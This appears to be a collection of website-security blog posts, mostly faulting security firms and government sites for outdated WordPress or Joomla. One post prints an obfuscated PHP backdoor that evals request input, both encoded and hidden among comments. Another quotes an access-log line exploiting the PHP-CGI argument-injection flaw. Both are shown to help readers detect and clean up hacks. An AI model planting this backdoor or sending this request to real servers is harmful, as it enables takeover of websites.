Acunetix Website Running Outdated and Insecure Version of WordPress

In our dealing with the security of websites one of the biggest obstacles to improving security is that basic security measures are often not taken, while there are lots of companies trying to push additional security measures that are not needed in most situations and in many cases are not going provide additional protection against threats. A major cause of this seems to be that many companies involved in providing security services are not actually concerned about security, whether for their own website or yours. Acunetix provides a good example of this. Acunetix is the maker of vulnerability scanner for websites and promotes themselves as the “worldwide leader in web application security”. Their scanner has a number of features specifically for looking at vulnerabilities in WordPress, including checking for outdated plugins. Based on all of that you would expect that they would be making sure to take the basic step of keeping the installation of WordPress running their website up to date, but surprisingly you would be wrong:

Acunetix is Running WordPress 3.5.1It has now been nearly two months since WordPress 3.5.2, which included several security fixes, was released. In the release announcement for that version users were warned:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

When a company providing the tools to keep websites secure is failing to take care of basic security measures on their own website it doesn’t bode well for website security improving in the near term.

OpenX Doesn’t Take Security Seriously

Earlier this week it was discovered that the downloads of OpenX 2.8.10 had been modified at some point to include malicious code that allowed remote code execution. OpenX’s blog post about the incident starts with the claim that “OpenX takes security seriously.”. This isn’t the first time they have claimed that in a blog post (that previous blog post has the dubious distinction of being the third post named Security Matters on their blog). The claim that they take security seriously is hard to square with what happened in this instance, especially in light of previous events. Unlike the issues mentioned in those previous blog posts, which involved unintentional security vulnerabilities, in this case someone was able to gain access to OpenX’s website and modify files on the website to include malicious code without being detected by them. It only came to light that the files had been modified after the vulnerability added to the download was being actively exploited.

That isn’t something that should happen and it would be a big red flag that security isn’t taken seriously if it had only happened once. But this doesn’t seem to be the first time that OpenX’s website has been breached. It appears that their website was previously breached and used to exploit OpenX ad servers in April of last year. OpenX 2.8.10 wasn’t released until September of last year, so this most recent issue would have come either from a subsequent breach or from them not shutting off access after the first breach was detected.

Their post emphasizes that their other products were not impacted by the vulnerability in the downloads, but considering they were breached and didn’t detect it, it reasonable to be concerned that the breach may have reached other parts of their systems. Their post gives no indication that they made any check to insure that is the case.

The claim that they take security seriously is even harder to believe in light of the fact that they fail to take basic security measures with their website even after having their website breached at least twice. This can be seen by their use of an outdated version of WordPress on the very blog were they are claiming to take security seriously:

OpenX Blog is Running WordPress 3.4.1

WordPress 3.4.1 is eleven months out of date and there have been three updates with security fixes released (3.4.2, 3.5.1, and 3.5.2). The announcement for 3.5.2, released on June 21, included this message, which OpenX has ignored:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

WordPress is very easy to update, so if they can’t manage to do that it seems likely that they are failing to take other more complicated security measures that need to be taken when a website is being targeted, as theirs has been.

OpenX Ignores Security Issue

Back in July of last year we sent an email to OpenX’s security email address to inform that there was a vulnerability in the Zend Framework that ships with OpenX. We never heard anything back from them and the vulnerable file has not been updated in OpenX.

WPTemplate.com Spreads Bad on Information on Securing WordPress

When it comes the security of WordPress there are unfortunately a lot of people out there spreading bad information. We were on the receiving end of one of these in the past few days. We received an email from xpedientdigitalmedia.com trying to get us to promote an infographic on WordPress security from their website WPTemplate.com. You can tell how much they care about security when you see this:WPTablet.com is Running WordPress 3.5.1Keeping WordPress up to date is one the basic security measures that you need to doing to make sure your website is secure. If you are website about WordPress you have no excuse for not keeping it up to date, especially when the release notice for the new version, that was released last month, warns:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

Amazingly their security advice includes making sure to keep WordPress up to date, but they don’t follow their own advice and you shouldn’t either.

It really isn’t worth going through all of the bad information they managed to pack in to their infographic, but here are a couple of really bad pieces of advice:

One of their security recommendations is “Do not install WordPress themes that are available for free.”.  Something being free doesn’t make it insecure and something costing money doesn’t make it secure. WordPress is free, would that make it insecure? Do they think that the free themes on the WordPress website are insecure?

The second one is doozy. They claim that one of the “most common ways that result in the site being hacked” is “approving comments that are non relevant”. This isn’t even a way to be hacked, much less a common one. If adding a comment could lead to your website being hacked that would be a huge security vulnerability and the solution wouldn’t be to not approve irrelevant comments. What would stop someone from exploiting the vulnerability with a relevant comment instead?

Unfortunately their bad advice isn’t just on their website. A lot of websites have taken up their offer to spread the thing, including noupe, WP Daily Themes, and WP Daily. Incidentally, WP Daily titled their post on WordPress 3.5.2 UH OH. WP 3.5.2 SECURITY UPDATE. DO THIS NOW. and yet they didn’t:

WP Daily Website is Running WordPress 3.5.1

A Step To Actually Improve WordPress Security

Currently if a plugin in the WordPress.org Plugin Directory is found to have a security vulnerability and it is not fixed the plugin is removed from the Plugin Directory. Unfortunately anyone who is already using the plugin is not provided any alert that the plugin is known to be insecure. We have been pushing for this situation to be handled properly for some time. Until an alert is added in WordPress itself, you can get a more limited version of this functionality using our No Longer in Directory plugin.

Checkmarx Website Running Outdated and Insecure Version of WordPress

In yet another sad sign of how bad internet security is these days, a security company named Checkmarx released findings on security vulnerabilities in WordPress plugins (PDF) while running their own website on an outdated an insecure version of WordPress:

Checkmarx Website is Running WordPress 3.4.1

Checkmarx has failed to apply the last two security update releases of WordPress. WordPress 3.4.1, which was release in September of 2012, and WordPress 3.5.1, which was released in January.

In their report one of their recommendations is keeping plugins up to date:

3. Ensure all your plugins are up to date
Do not ignore all those notification emails of an upgraded plugin version. You can even use a
purposeful WordPress plugin that notifies admins on updates to other installed plugins.
There are also third party services which provide a plugin update notification and
management offering.

How is it that security companies that seem to understand basic security practices fail to take them with their own websites?

Also, on Checkmarx’s website they tout they are a member of the Open Web Application Security Project (OWASP), which we recently noted also runs their website on outdated and insecure software.

Another Security Recommendation for WordPress Plugins

Checkmarx’s report is missing one important step that should be taken related to security of WordPress plugins. Currently if a plugin in the WordPress.org Plugin Directory is found to have a security vulnerability and it is not fixed the plugin is removed from the Plugin Directory. Unfortunately anyone who is already using the plugin is not provided any alert that the plugin is known to be insecure. We have been pushing for this situation to be handled properly for some time. Until an alert is added in WordPress itself, you can get a more limited version of this functionality using our No Longer in Directory plugin.

CIO.gov Running Outdated and Insecure Version of WordPress

In the recent past we have mentioned that the websites of the White House, Department of Homeland Security, and FEMA are failing to take the basic security step of keeping the software powering their websites up to date. It then should not come as too much surprise to see this:

CIO.gov is Running WordPress 3.4.2

CIO.gov is the website of the U.S. Chief Information Officer and the Federal CIO Council and on the website it is described as “serving as a central resource for information on Federal IT”and “identifying best practices”.

Since the website is running WordPress 3.4.2 they failed to update WordPress for seven months and more importantly they failed to update when a security release was put out back in January.

With the US government’s and CIO Council’s claimed focus on cybersecurity it is troubling that they are failing to do something so basic. It also begs the questions about one of the CIO Council’s areas of cybersecurity focus, “Continuous Monitoring“:

Continuous monitoring is a risk management approach to cybersecurity that maintains an accurate picture of an agency’s security risk posture, provides visibility into assets, and leverages use of automated data feeds to quantify risk, ensure effectiveness of security controls, and implement prioritized remedies. A well-designed and well-managed continuous monitoring program can effectively transform an otherwise static security control assessment and risk determination process into a dynamic process that provides essential, near real-time security status.

In today’s environment of widespread cyber-intrusions, advanced persistent threats, and insider threats, it is essential for agencies to have real-time accurate knowledge of their enterprise IT overall security posture. Agencies need to constantly know and remain aware of their enterprise security status so that responses to external and internal threats can be made swiftly.

If continuous monitoring is being used for their own website it isn’t working. If it isn’t being used, you have wonder why it is one of their focuses when they haven’t even started using it themselves.

Wired’s Threat Level Blog Running Outdated and Insecure Version of WordPress

Keeping software running on a website up to date is an important part of keeping it secure, but, as we have been focusing on a lot lately, organizations that you would expect to be up to task of handling their security are failing to do that. Whether it is web security companies, a web security organization, or major government websites (the DHS did finally get their website up to date, though) they are all failing to taking this easy security step. We can now add to this recent list, web security journalism.

Here is the WordPress version powering Wired’s Threat Level blog, which covers “Privacy, Crime and Security Online”:

Wired's Threat Level blog is Running WordPress 3.4.2

Since they are running 3.4.2 they failed to update WordPress for seven months and more importantly they failed to update when a security release was put out back in January. If an important source of security information isn’t aware they need to keep their website up to date, it isn’t a good sign that others will be getting that information either.

NATO’s Allied Command Transformation Website Running Outdated and Unsupported Version of Joomla

NATO ministers meet last week and discussed improving their cybersecurity. A bad sign for their current handling of cybersecurity is the website of NATO’s Allied Command Transformation, which is running an outdated and unsupported version of Joomla:

NATO Allied Command Transformation Website is Running Joomla 1.5

Security updates for Joomla 1.5 ended in September of 2012, so the website should have been migrated to a supported version of Joomla – currently versions 2.5 and 3.1 – some time ago .

Keeping the software powering a website up to date is a basic measure needed to be taken to keep it secure and it is relativity easy in comparison to what NATO needs to do to fully secure all of their systems.

It might be reasonable to cut NATO some slack on their failure to keep up to date considering that Joomla is still running Joomla 1.5 on a number of their websites:

Joomla Extensions Directory is Running Joomla 1.5Joomla Community Portal is Running Joomla 1.5Joomla Resource Directory is Running Joomla 1.5

Impermium Has Web Security and Spam Issues of Their Own

Impermium promotes itself as “Protecting the Web from Security Threats“, that they are “run by leading anti-spam and cybersecurity experts“, and that they have “a cutting-edge comment spam filter“; but a quick look shows that they can’t even handle web security and spam on their own website.

Keeping software running on a website up to date is one of the basic website security measures that should be taken, so a company run by “cybersecurity experts” is going to be doing that right? Wrong:

Impermium is Running WordPress 3.4.2

Not only have they failed to update WordPress for over six months, but they failed to update when a security release was put out back in January. WordPress makes it very easy to update, so there isn’t any excuse for not doing it. They are not alone in this; a few weeks ago we mentioned that that the web security company StopTheHacker also was running the same outdated version of WordPress. What does it say that web security companies either don’t know the basics of website security or don’t care about it?

As for spam, here is the Impermium Knowledge Base:

 Impermium Knowledge Base

If you are an anti-spam company you shouldn’t miss spam entries like “Significant Bad Credit Loans for Debt Consolidation Loan” and “Know how different types of loans could benefit you” in your Knowledge Base.

Hackers Attempting To Hide Malicious Code in Files With Comments

When hackers add malicious code to a website’s files they often obfuscate it in some way. A simple method looks like this:

eval(base64_decode(LypZYk9PKi9pZi8qX1U8ZkpPbTgqLygvKjdTU31NKi9pc3NldC8qT2FDKi8oLypyWE9KMyovJF9SRVFVRVNULypDMyEqL1svKlVpJiovJ2onLyohfk1lKi8uLyotaUJVJigqLydnJy8qKS41XGwqLy4vKm50YGpnbCovJ2snLypAXmo/Ki8uLypcOE13PF4qLyd2bycvKk47a3xCVyovXS8qOnM7Ki8vKjxAXXd+ISovKS8qUGQgKi8vKkJDRW1xKi8pLypWZ0xwbiovZXZhbC8qZStNcyE9PiovKC8qVERCISovc3RyaXBzbGFzaGVzLypeenBXbyovKC8qSGFMeVE7Ki8kX1JFUVVFU1QvKjo4TDYmVHMqL1svKnY+XWI1aXwqLydqJy8qak1lKi8uLyooSiZJOCovJ2cnLyooTUpnOiovLi8qdGo5LSovJ2snLyo3OVl8eU8qLy4vKnlsd2h3Ki8ndm8nLypBS08nXHMqL10vKm5TTDZ9Ki8vKmEySSovKS8qJX0hMyovLyo6VDZwZkAqLykvKjRKOlQmKi8vKlxZeWtEZW8qLzsvKmdpLWBEKi8=));

This method isn’t very effective as a method to disguise the code as the code will stick out and it is easy enough to do a search through all the files on a website for eval(base64_decode( and similar functions that are used, find matching code, and then undo obfuscation to check for malicious code. We sometimes see other methods are more effective, but more often than not the less effective ones are used. One other method that we have been seeing used a lot recently is hiding the code among numerous comments. Because comments are ignored when code is executed, the additional code only impacts someone trying to review the code. Here is one example of malicious code hidden among comments:

/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/’j’/*!~Me*/./*-iBU&(*/’g’/*).5\l*/./*nt`jgl*/’k’/*@^j?*/./*\8Mw<^*/’vo’/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/’j’/*jMe*/./*(J&I8*/’g’/*(MJg:*/./*tj9-*/’k’/*79Y|yO*/./*ylwhw*/’vo’/*AKO’\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/

It probably looks like a bunch of gibberish to you. But amongst the apparent gibberish is the malicious code (shown in bold):

/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/’j‘/*!~Me*/./*-iBU&(*/’g‘/*).5\l*/./*nt`jgl*/’k‘/*@^j?*/./*\8Mw<^*/’vo‘/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/’j‘/*jMe*/./*(J&I8*/’g‘/*(MJg:*/./*tj9-*/’k‘/*79Y|yO*/./*ylwhw*/’vo‘/*AKO’\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/

When the comments are stripped out you can see the code by itself:

if(isset($_REQUEST[jgkvo]))eval(stripslashes($_REQUEST[jgkvo]));

That code is a simple backdoor that will execute the code from the variable “jgkvo” when it is sent to a web page that the malicious code is in.

Is Your Web Host Keeping PHP Up to Date?

When it comes to keeping your website secure your web host should be the least of your worries. These are technology companies, sometimes rather large, whose focus is on websites. You would think that they would be better at handling website security than anyone other security professionals. Unfortunately we often find that they are not. As just one example, last year we discussed the fact that Media Temple was incorrectly blaming a hack of websites hosted by them on their customers running outdated software on their websites, while they themselves were running outdated software on their website. Over a year later they are still are not bothering to take the basic step of keeping software running on their website up to date:

Media Temple's Sytem Status Website is Running WordPress 3.3.2

Trying to access the security of web hosts is difficult because much of the information needed to do that assessment is only available to them. There are some things that you can check on and one of those is whether they are keeping the version of PHP on the server hosting your website up to date. If you are using WordPress, Joomla, Drupal, or a lot of other web software then you are using PHP and it is important to keep that up to date, as a hacked website we cleaned up this week shows.

One of the basic steps of cleaning up a hacked website is determining how it was hacked and then fixing the vulnerability so that the website doesn’t get hacked again (unfortunately, many companies that clean up hacked websites cut corners and don’t do this). In reviewing the log files for the website in question we traced the original exploitation to this line in the website’s access log:

91.224.160.25 – – [16/Apr/2013:19:18:32 -0400] “POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1” 200 68

What that shows is that a vulnerability in PHP versions prior to 5.3.13 and 5.4.3 was attempting to be exploited. Unfortunately the website in question was running an older vulnerable version of PHP and was configured in a way that made it susceptible to the vulnerability. If PHP had been kept up to date the website would not have been hacked.

The PHP developers fairly regularly release new versions that fix security vulnerabilities in the software. The most recent releases with security fixes were versions 5.3.23 and 5.4.13, released in March. Unfortunately, we often find that our client’s web hosts are not keeping PHP up to date. If your web host isn’t keeping PHP updated you probably should move to a web host that takes such basic security seriously.

If you are wondering what version of PHP your web host is using for your website there are a number of ways to find that out. The least technical way to do that is to contact their customer support and ask them what version of PHP in use. It would also be good to ask them what their upgrade policy is for PHP and other software powering the web server, to make sure that they properly handling that. You can sometimes find the PHP version in use in the control panel for your website or the administrative area of the website. You can also use a tool we have created that allows you to check the version of various software running the server your website is on.